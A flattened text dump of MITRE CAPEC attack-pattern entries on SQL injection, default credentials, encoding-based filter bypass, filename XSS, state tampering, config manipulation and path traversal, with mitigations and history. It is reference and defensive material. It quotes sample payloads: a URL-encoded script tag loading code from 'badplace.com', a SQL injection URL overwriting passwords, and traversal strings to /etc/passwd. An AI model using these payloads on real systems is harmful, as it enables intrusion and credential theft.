schema. Automatically extract database schema using a tool such as Absinthe. env-Web Manually perform the blind SQL Injection to extract desired information about the database schema. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Success outcome in previous step. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Failure outcome in previous step. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Desired information about database schema extracted. Desired information about database schema could not be extracted. Large number of unusual queries in database logs. Exploit SQL Injection vulnerability Use the information obtained in the previous steps to successfully inject the database in order to bypass checks or modify, add, retrieve or delete data from the database Use information about how to inject commands into SQL queries as well as information about the database schema to execute attacks such as dropping tables, inserting records, etc. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Success outcome in previous step. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Failure outcome in previous step. env-Web env-ClientServer env-Peer2Peer env-CommProtocol Attacker achieves goal of unauthorized system access, denial of service, etc. Attacker cannot exploit the information gathered by blind SQL Injection SQL queries used by the application to store, retrieve or modify data. User-controllable input that is not properly validated by the application as part of SQL queries. High High Injection Analysis In the PHP application TimeSheet 1.1, an attacker can successfully retrieve username and password hashes from the database using Blind SQL Injection. If the attacker is aware of the local path structure, the attacker can also remotely execute arbitrary code and write the output of the injected queries to the local path. Blind SQL Injection is possible since the application does not properly sanitize the $_POST['username'] variable in the login.php file. CVE-2006-4705 Medium Determining the database type and version, as well as the right number and type of parameters to the query being injected in the absence of error messages requires greater skill than reverse-engineering database error messages. None In order to determine the right syntax for the query to inject, the attacker tries to determine the right number of parameters to the query and their types. This is achieved by formulating conditions that result in a true/false answer from the database. If the logical condition is true, the database will execute the rest of the query. If not, a custom error page or a default page is returned. Another approach is to ask such true/false questions of the database and note the response times to a query with a logically true condition and one with a false condition. The only indicators of successful Blind SQL Injection are the application or database logs that show similar queries with slightly differing logical conditions that increase in complexity over time. However, this requires extensive logging as well as knowledge of the queries that can be used to perform such injection and return meaningful information from the database. Security by Obscurity is not a solution to preventing SQL Injection. Rather than suppress error messages and exceptions, the application must handle them gracefully, returning either a custom error page or redirecting the user to a default page, without revealing any information about the database or the application internals. Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(') or SQL-comments (--) based on the context in which they appear. Integrity Modify application data Confidentiality Read application data Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code User-controllable input to the application SQL statements intended to bypass checks or retrieve information about the database Back-end database The injected SQL statements are such that they result in a true/false query to the database. If the database evaluates a statement to be logically true, it responds with the requested data. If the condition is evaluated to be logically false, an error is returned. The attacker modifies the Boolean condition each time to gain information from the database. 89 Targeted 209 Targeted 74 Secondary 20 Secondary 390 Secondary 697 Secondary 713 Secondary 707 Secondary 1000 Attack Pattern CanPrecede 66 1000 Attack Pattern ChildOf 66 Custom error pages must be used to handle exceptions such that they do not reveal any information about the architecture of the application or the database. Special characters in user-controllable input must be escaped before use by the application. Employ application-level safeguards to filter data and handle exceptions gracefully. Reluctance to Trust Failing Securely Defense in Depth Never Use Input as Part of a Directive to any Internal Component Handle All Errors Safely Penetration High High High All All All All Common Weakness Enumeration (CWE) CWE-20 - Input Validation Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/20.html Common Weakness Enumeration (CWE) CWE-390 - Improper Error Handling Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/390.html Chiradeep B Chhaya 2007-02-22 Third Draft - Revised to schema v1.4 Chiradeep B Chhaya 2007-02-22 Third Draft - Revised to schema v1.4 Malik Hamro Cigital, Inc 2007-02-27 Reformat to new schema and review Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description, Attack Prerequisites and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow MITRE Content Team MITRE 2013-06-21 Updated Summary Malik Hamro Cigital, Inc 2007-02-27 Reformat to new schema and review Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Description, Attack Prerequisites and Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Amit Sethi Cigital, Inc. 2007-10-29 Added extended Attack Execution Flow CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Payload_Activation_Impact An attacker may try certain common (default) usernames and passwords to gain access into the system and perform unauthorized actions. An attacker may try an intelligent brute force using known vendor default credentials as well as a dictionary of common usernames and passwords. Many vendor products come preconfigured with default (and thus well-known) usernames and passwords that should be deleted prior to usage in a production environment. It is a common mistake to forget to remove these default login credentials. Another problem is that users would pick very simple (common) passwords (e.g. "secret" or "password") that make it easier for the attacker to gain access to the system compared to using a brute force attack or even a dictionary attack using a full dictionary. The system uses one factor password based authentication. High Medium Brute Force User Bob sets his password to "123". If the system does not have password strength enforcement against a sound password policy, this password may be admitted. A simple numeric sequence like this is one of the most common passwords and is easily guessable by an attacker. Cisco 2700 Series Wireless Location Appliances (version 2.1.34.0 and earlier) have a default administrator username "root" with a password "password". This allows remote attackers to easily obtain administrative privileges. CVE-2006-5288 Low An attacker just needs to gain access to common default usernames/passwords specific to the technologies used by the system. Additionally, a brute force attack leveraging common passwords can be easily realized if the user name is known. Technology or vendor specific list of default usernames and passwords. Try to determine what products are used in the implementation of the system. Determine if there are any default accounts associated with those products. Many incorrect login attempts are detected by the system. Try to spoof IP addresses so that it does not look like the incorrect log in attempts are coming from the same computer. Delete all default account credentials that may be put in by the product vendor. Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user. Put together a strong password policy and make sure that all user created passwords comply with it. Alternatively automatically generate strong passwords for users. Passwords need to be recycled to prevent aging, that is every once in a while a new password must be chosen. Confidentiality Access_Control Authorization Gain privileges / assume identity 521 Targeted 262 Targeted 263 Targeted 798 Targeted 693 Targeted 1000 Attack Pattern ChildOf 49 Failing Securely Penetration High High Medium All All All All Eugene Lebanidze Cigital, Inc 2007-02-26 Eugene Lebanidze Cigital, Inc 2007-02-26 Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content Sean Barnum Cigital, Inc 2007-03-01 Review and revision of content CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker may provide a unicode string to a system component that is not unicode aware and use that to circumvent the filter or cause the classifying mechanism to fail to properly understanding the request. That may allow the attacker to slip malicious data past the content filter and/or possibly cause the application to route the request incorrectly. Survey the application for user-controllable inputs Using a browser or an automated tool, an attacker follows all public links and actions on a web site. He records all the links, the forms, the resources accessed and all other potential entry-points for the web application. Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL. env-Web Use a proxy tool to record all user input entry points visited during a manual traversal of the web application. env-Web Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery. env-Web Inputs are used by the application or the browser (DOM) env-Web Using URL rewriting, parameters may be part of the URL path. env-Web No parameters appear to be used on the current page. Even though none appear, the web application may still use them if they are provided. env-Web Applications that have only static pages or that simply present information without accepting input are unlikely to be susceptible. env-Web A list of URLs, with their corresponding parameters (POST, GET, COOKIE, etc.) is created by the attacker. A list of application user interface entry fields is created by the attacker. A list of resources accessed by the application is created by the attacker. Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Use CAPTCHA to prevent the use of the application by an automated tool. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Probe entry points to locate vulnerabilities The attacker uses the entry points gathered in the "Explore" phase as a target list and injects various Unicode encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited. Try to use Unicode encoding of content in Scripts in order to bypass validation routines. env-Web Try to use Unicode encoding of content in HTML in order to bypass validation routines. env-Web Try to use Unicode encoding of content in CSS in order to bypass validation routines. env-Web The application accepts user-controllable input. env-Web The attacker's Unicode encoded payload is processed and acted on by the application without filtering or transcoding The application decodes the charset and filters the inputs. Implement input validation routines that filter or transcode for Unicode content. Specify the charset of the HTTP transaction/content. Monitor inputs to web servers. Alert on unusual charset and/or characters. Actively monitor the application and either deny or redirect requests from origins that appear to be attack attempts. Filtering is performed on data that has not be properly canonicalized. High Medium Modification of Resources API Abuse Injection Attack Example: Unicode Encodings in the IIS Server A very common technique for a unicode attack involves traversing directories looking for interesting files. An example of this idea applied to the Web is http://target.server/some_directory/../../../winnt In this case, the attacker is attempting to traverse to a directory that is not supposed to be part of standard Web services. The trick is fairly obvious, so many Web servers and scripts prevent it. However, using alternate encoding tricks, an attacker may be able to get around badly implemented request filters. In October 2000, a hacker publicly revealed that Microsoft's IIS server suffered from a variation of this problem. In the case of IIS, all the attacker had to do was provide alternate encodings for the dots and/or slashes found in a classic attack. The unicode translations are . yields C0 AE / yields C0 AF \ yields C1 9C Using this conversion, the previously displayed URL can be encoded as http://target.server/some_directory/%C0AE/%C0AE/%C0AE%C0AE/%C0AE%C0AE/winnt CVE-2000-0884 Medium An attacker needs to understand unicode encodings and have an idea (or be able to find out) what system components may not be unicode aware. Unicode encoded data is passed to APIs where it is not expected Ensure that the system is Unicode aware and can properly process Unicode data. Do not make an assumption that data will be in ASCII. Ensure that filtering or input validation is applied to canonical data. Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Confidentiality Access_Control Authorization Bypass protection mechanism Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Integrity Modify application data Availability DoS: crash / exit / restart 176 Targeted 171 Targeted 179 Targeted 180 Targeted 173 Targeted 172 Targeted 184 Targeted 183 Targeted 74 Targeted 20 Targeted 697 Targeted 692 Targeted 1000 Attack Pattern PeerOf 64 1000 Attack Pattern PeerOf 79 1000 Attack Pattern PeerOf 72 1000 Attack Pattern PeerOf 43 1000 Attack Pattern ChildOf 267 Canonicalize data prior to performing any validation or filtering on it. Be aware of alternate encodings. Penetration Medium High Medium All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-20 - Input Validation Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/20.html [R.71.1][REF-2] Cigital, Inc 2007-03-01 [R.71.1][REF-2] Cigital, Inc 2007-03-01 Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description Eugene Lebanidze Cigital, Inc 2007-02-26 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-05 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name, Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Romain Gaucher Cigital, Inc 2009-02-10 Created draft content for detailed description Sean Barnum Cigital Federal, Inc 2009-04-13 Reviewed and revised content for detailed description CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases This attack targets the encoding of the URL. An attacker can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL. An URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc. The attacker could also subvert the meaning of the URL string request by encoding the data being sent to the server through a GET request. For instance an attacker may subvert the meaning of parameters used in a SQL request and sent through the URL string (See Example section). The attacker accesses the server using a specific URL. The attacker tries to encode some special characters in the URL. The attacker finds out that some characters are not filtered properly. The attacker crafts a malicious URL string request and sends it to the server. The server decodes and interprets the URL string. Unfortunately since the input filtering is not done properly, the special characters may have harmful consequences. The application should accepts and decodes URL input. The application performs insufficient filtering/canonicalization on the URLs. High High Injection Protocol Manipulation API Abuse Attack Example: URL Encodings in IceCast MP3 Server. The following type of encoded string has been known traverse directories against the IceCast MP3 server9: http://[targethost]:8000/somefile/%2E%2E/target.mp3 or using "/%25%25/" instead of "/../". The control character ".." can be used by an attacker to escape the document root. CVE-2001-0784 Cross-Site Scripting URL-Encoded attack: http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e HTML execution: <script src="http://www.badplace.com/nasty.js"></script> [R.72.3][REF-35] SQL Injection Original database query in the example file - "login.asp": SQLQuery = "SELECT preferences FROM logintable WHERE userid='" & Request.QueryString("userid") & "' AND password='" & Request.QueryString("password") & "';" URL-encoded attack: http://target/login.asp?userid=bob%27%3b%20update%20logintable%20set%20passwd%3d%270wn3d%27%3b--%00 Executed database query: SELECT preferences FROM logintable WHERE userid='bob'; update logintable set password='0wn3d'; From "URL encoded attacks", by Gunter Ollmann - http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html Low An attacker can try special characters in the URL and bypass the URL validation. Medium The attacker may write a script to defeat the input filtering mechanism. An attacker can manually inject special characters in the URL string request and observe the results of the request. Custom scripts can also be used. For example, a good script for verifying the correct interpretation of UTF-8 encoded characters can be found at http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt Automated tools such as fuzzer can be used to test the URL decoding and filtering. If the first decoding process has left some invalid or blacklisted characters, that may be a sign that the request is malicious. Traffic filtering with IDS (or proxy) can detect requests with suspicious URLs. IDS may use signature based identification to reveal such URL based attacks. Sometime the percent escaping can be used to obfuscate the attack itself. Alternative method of data encoding can be used. Obfuscation technique such as IP address encoding can also be used (See reference section : "URL encoded attacks", by Gunter Ollmann). Refer to the RFCs to safely decode URL. Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive. There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx). Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process. Assume all input is malicious. Create a white list that defines all valid input to the software system based on the requirements specifications. Input that does not match against the white list should not be permitted to enter into the system. Test your decoding process against malicious input. Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. (See related guideline section) When client input is required from web-based forms, avoid using the "GET" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the "POST method whenever possible. Confidentiality Read files or directories Availability DoS: resource consumption (memory) Denial of Service Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Confidentiality Access_Control Authorization Gain privileges / assume identity 173 Targeted 177 Targeted 171 Targeted 172 Targeted 73 Targeted 21 Targeted 74 Targeted 20 Targeted 1000 Attack Pattern PeerOf 79 1000 Attack Pattern PeerOf 71 1000 Attack Pattern PeerOf 43 1000 Attack Pattern ChildOf 267 Reluctance to Trust Penetration Exploitation High High Medium Client-Server SOA All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 Common Weakness Enumeration (CWE) CWE-20 - Input Validation Draft The MITRE Corporation 2007 http://cwe.mitre.org/data/definitions/20.html Gunter Ollmann URL Encoded Attacks - Attacks using the common web browser CGISecurity.com http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html T. Berners-Lee R. Fielding L. Masinter RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax January 2005 http://www.ietf.org/rfc/rfc3986.txt T. Berners-Lee L. Masinter M. McCahill RFC 1738 - Uniform Resource Locators (URL) December 1994 http://www.ietf.org/rfc/rfc1738.txt HTML URL Encoding Reference W3Schools.com Refsnes Data http://www.w3schools.com/tags/ref_urlencode.asp The URLEncode and URLDecode Page Albion Research Ltd http://www.albionresearch.com/misc/urlencode.php David Wheeler Secure Programming for Linux and Unix HOWTO 5.11.4. Validating Hypertext Links (URIs/URLs) http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS [R.72.1][REF-2] Cigital, Inc 2007-03-01 [R.72.1][REF-2] Cigital, Inc 2007-03-01 Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback MITRE Content Team MITRE 2013-06-21 Updated Example-Instance_Description Eric Dalci Cigital, Inc 2007-02-13 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-07 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Solutions_and_Mitigations An attack of this type involves an attacker inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities. The victim must trust the name and locale of user controlled filenames. High High Modification of Resources Phishing attacks rely on a user clicking on links on that are supplied to them by attackers masquerading as a trusted resource such as a bank or online auction site. The end user's email client hosts the supplied resource name in this case via email. The resource name, however may either 1) direct the client browser to a malicious site to steal credentials and/or 2) execute code on the client machine to probe the victim's host system and network environment. Low To achieve a redirection and use of less trusted source, an attacker can simply edit data that the host uses to build the filename Medium Deploying a malicious "look-a-like" site (such as a site masquerading as a bank or online auction site) that the user enters their authentication data into. High Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process. Design: Use browser technologies that do not allow client side scripting. Implementation: Ensure all content that is delivered to client is sanitized against an acceptable content specification. Implementation: Perform input validation for all remote content. Implementation: Perform output validation for all remote content. Implementation: Disable scripting languages such as JavaScript in browser Implementation: Scan dynamically generated content against validation specification Confidentiality Access_Control Authorization Gain privileges / assume identity Confidentiality Integrity Availability Execute unauthorized code or commands Run Arbitrary Code Availability Alter execution logic Confidentiality Read application data Payload delivered through user controlled filename. Command(s) executed directly on host Client machine and client network Enables attacker to execute server side code with any commands that the program owner has privileges to. 20 Targeted 184 Secondary 96 Targeted 348 Targeted 116 Targeted 350 Targeted 86 Secondary 697 Targeted 1000 Attack Pattern ChildOf 63 1000 Attack Pattern ChildOf 165 Penetration Exploitation High High High All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.73.1][REF-2] Cigital, Inc 2007-01-01 [R.73.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Related Attack Patterns Sean Barnum Cigital, Inc 2007-04-13 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2014-02-06 Updated Attacker_Skills_or_Knowledge_Required, Examples-Instances, Solutions_and_Mitigations An attacker modifies state information maintained by the target software in user-accessible locations. If successful, the target software will use this tainted state information and execute in an unintended manner. State management is an important function within an application. User state maintained by the application can include usernames, payment information, browsing history as well as application-specific contents such as items in a shopping cart. Manipulating user state can be employed by an attacker to elevate privilege, conduct fraudulent transactions or otherwise modify the flow of the application to derive certain benefits. Attacker determines the nature of state management employed by the application. This includes determining the location (client-side, server-side or both) and possibly the items stored as part of user state The attacker now tries to modify the user state contents (possibly blindly if the contents are encrypted or otherwise obfuscated) and observe the effects of this change on the application. Having determined the information stored in the user state and the possible ways to modify it, the attacker can violate it in order to perform illegitimate actions. High Medium Analysis Modification of Resources Upon authenticating a user, an application stores the authentication decision (auth=0/1) in a cookies unencrypted. At every request, this cookie is checked to permit or deny a request. An attacker can easily violate this representation of user state and set auth=1 at every request in order to gain illegitimate access and elevated privilege in the application. Medium The attacker needs to have knowledge of state management as employed by the target application, and also the ability to manipulate the state in a meaningful way. No special resources are required. An attacker can choose to use a data tampering tool to aid in the attack. Analysis: The attacker observes contents of client-side user state variables, stored in cookies or hidden fields or query strings, and modifies them in order to observe their effect on the application. Do not rely solely on user-controllable locations, such as cookies or URL parameters, to maintain user state Do not store sensitive information, such as usernames or authentication and authorization information, in user-controllable locations. At all times sensitive information that is part of the user state must be appropriately protected to ensure confidentiality and integrity at each request Confidentiality Access_Control Authorization Gain privileges / assume identity Integrity Modify application data User-controllable user state variables Modified or injected user state variables State management mechanism of the application Altered user state leading to information leak or elevated privilege 372 Secondary 371 Targeted 315 Targeted 353 Targeted 693 Targeted CVE-2005-4448 FlatNuke 2.5.6 verifies authentication credentials based on an MD5 checksum of the admin name and the hashed password rather than the plaintext password, which allows attackers to gain privileges by obtaining the password hash (possibly via CVE-2005-2813), then calculating the credentials and including them in the secid cookie. 1000 Category ChildOf 172 Protect user state that is stored client-side with integrity checks to ensure that a malicious user cannot gain unauthorized access to parts of the application Authenticate every request to ensure that it is coming from a legitimate user and that the request is a valid one in the current context. Reluctance To Trust Never Assuming That Your Secrets Are Safe Treat the Entire Inherited Process Context as Unvalidated Input Use Well-Known Cryptography Appropriately and Correctly Exploitation High High Medium Client-Server SOA All All All Chiradeep B Chhaya Cigital, Inc 2007-03-08 Taken over from Eric Dalci Chiradeep B Chhaya Cigital, Inc 2007-03-08 Taken over from Eric Dalci Sean Barnum Cigital, Inc 2007-03-08 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Description Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback Sean Barnum Cigital, Inc 2007-03-08 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Description Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Attack_Phases, Probing_Techniques, Relevant_Security_Requirements Generally these are manually edited files that are not in the preview of the system administrators, any ability on the attackers' behalf to modify these files, for example in a CVS repository, gives unauthorized access directly to the application, the same as authorized users. Configuration files must be modifiable by the attacker Very High High Modification of Resources The BEA Weblogic server uses a config.xml file to store configuration data. If this file is not properly protected by the system access control, an attacker can write configuration information to redirect server output through system logs, database connections, malicious URLs and so on. Access to the Weblogic server may be from a so-called Custom realm which manages authentication and authorization privileges on behalf of user principals. Given write access, the attacker can insert a pointer to a custom realm jar file in the config.xml < CustomRealm ConfigurationData="java.util.Properties" Name="CustomRealm" RealmClassName="Maliciousrealm.jar" /> The main issue with configuration files is that the attacker can leverage all the same functionality the server has, but for malicious means. Given the complexity of server configuration, these changes may be very hard for administrators to detect. Medium To identify vulnerable configuration files, and understand how to manipulate servers and erase forensic evidence Design: Enforce principle of least privilege Design: Backup copies of all configuration files Implementation: Integrity monitoring for configuration files Implementation: Enforce audit logging on code and configuration promotion procedures. Implementation: Load configuration from separate process and memory space, for example a separate physical device like a CD Confidentiality Access_Control Authorization Gain privileges / assume identity Configuration files Commands or configuration settings Configuration file processing routines Enables attacker to execute server side code with any commands that the program owner has privileges to. 349 Targeted 99 Targeted 77 Targeted 346 Targeted 353 Secondary 354 Secondary 713 Targeted 1000 Category ChildOf 233 1000 Attack Pattern ChildOf 176 Exploitation High High Medium All All All All G. Hoglund G. McGraw Exploiting Software: How to Break Code Addison-Wesley February 2004 [R.75.1][REF-2] Cigital, Inc 2007-01-01 [R.75.1][REF-2] Cigital, Inc 2007-01-01 Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Description Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback Gunnar Peterson Cigital, Inc 2007-02-28 Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" Sean Barnum Cigital, Inc 2007-03-09 Review and revise Richard Struse VOXEM, Inc 2007-03-26 Review and feedback leading to changes in Name and Description Sean Barnum Cigital, Inc 2007-04-16 Modified pattern content according to review and feedback CAPEC Content Team MITRE 2013-12-18 Updated Related_Attack_Patterns CAPEC Content Team MITRE 2014-02-06 Updated Description Summary An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible. Fingerprinting of the operating system In order to create a valid file injection, the attacker needs to know what the underlying OS is. Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports. env-Local env-CommProtocol env-Peer2Peer env-ClientServer TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, he attempts to guess the actual operating system. env-Embedded env-CommProtocol env-Peer2Peer env-ClientServer env-Web Induce errors to find informative error messages env-All The target software accepts connections via the network. env-Embedded env-CommProtocol env-Peer2Peer env-ClientServer env-Web Operating environment (operating system, language, and/or middleware) is correctly identified. Multiple candidate operating environments are suggested. Provide misleading information on TCIP/IP fingerprints (some operating systems can be configured to send signatures that match other operating systems). Provide misleading information at the server level (e.g., Apache, IIS, WebLogic, etc.) to announce a different server software. Some fingerprinting techniques can be detected by operating systems or by network IDS systems because they leave the network connection half-open, or they do not belong to a valid, open connection. Survey the Application to Identify User-controllable Inputs The attacker surveys the target application to identify all user-controllable inputs, possibly as a valid and authenticated user Spider web sites for all available links, entry points to the web site. env-Web Manually explore application and inventory all application inputs env-All The attacker develops a list of likely interesting path (application or OS related) Monitor velocity of page fetching in web logs. Humans who view a page and select a link from it will click far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Create links on some pages that are visually hidden from web browsers. Using iframes, images, or other HTML techniques, the links can be hidden from web browsing humans, but visible to spiders and programs. A request for the page, then, becomes a good predictor of an automated tool probing the application. Actively monitor the application and either deny or redirect requests from origins that appear to be automated. Monitor velocity of feature activations (non-web software). Humans who activate features (click buttons, request actions, invoke APIs, etc.) will do so far slower and far less regularly than tools. Tools make requests very quickly and the requests are typically spaced apart regularly (e.g. 0.8 seconds between them). Vary inputs, looking for malicious results Depending on whether the application being exploited is a remote or local one the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application Inject context-appropriate malicious file path using network packet injection tools (netcat, nemesis, etc.) env-CommProtocol env-Web env-Peer2Peer env-ClientServer Inject context-appropriate malicious file path using web test frameworks (proxies, TamperData, custom programs, etc.) or simple HTTP requests env-Web Inject context-appropriate malicious file system control syntax env-CommProtocol env-Web env-Peer2Peer env-ClientServer Inventorying in prior step is successful. env-All One or more injections that are appropriate to the platform provoke an unexpected response from the software, which can be varied by the attacker based on the input. Manipulate files accessible by the application The attacker may steal information or directly manipulate files (delete, copy, flush, etc.) The attacker injects context-appropriate malicious file path to access the content of the targeted file. env-All The attacker injects context-appropriate malicious file system control syntax to access the content of the targeted file. env-All The attacker injects context-appropriate malicious file path to cause the application to create, delete a targeted file. env-All The attacker injects context-appropriate malicious file system control syntax to cause the application to create, delete a targeted file. env-All The attacker injects context-appropriate malicious file path in order to manipulate the meta-data of the targeted file. env-All The attacker injects context-appropriate malicious file system control syntax in order to manipulate the meta-data of the targeted file. env-All The software performs an action the attacker desires. This might be displaying information, storing information in a file, delete a file or some other malicious activity. Use a system that logs file modification and/or access. Make the application run in a low-privileged mode to prevent such attack to access important files. Program must allow for user controlled variables to be applied directly to the filesystem Very High High Injection API Abuse Modification of Resources An example of using path traversal to attack some set of resources on a web server is to use a standard HTTP request http://example/../../../../../etc/passwd From an attacker point of view, this may be sufficient to gain access to the password file on a poorly protected system. If the attacker can list directories of critical resources then read only access is not sufficient to protect the system. Low To identify file system entry point and execute against an over-privileged system interface Design: Enforce principle of least privilege. Design: Ensure all input is validated, and does not contain file system commands Design: Run server interfaces with a non-root account and/or utilize chroot jails or other configuration techniques to constrain privileges even if attacker gains some limited access to commands. Design: For interactive user applications, consider if direct file system interface is necessary, instead consider having the application proxy communication. Implementation: Perform testing such as pen-testing and vulnerability scanning to identify directories, programs, and interfaces that grant direct access to executables. Confidentiality Access_Control Authorization Gain privileges / assume identity Integrity Modify application data Payload delivered through standard communication protocols and inputs. File system commands and specifiers File system File access or modification. 23 Targeted 22 Targeted 73 Targeted 77 Targeted 346 Targeted 348 Targeted 285 Secondary 264 Secondary 272 Targeted 59 Targeted 74 Targeted 15 Targeted 715 Targeted 1000 Attack Pattern ChildOf 13 1000 Attack Pattern ChildOf 137 1000 Attack Pattern 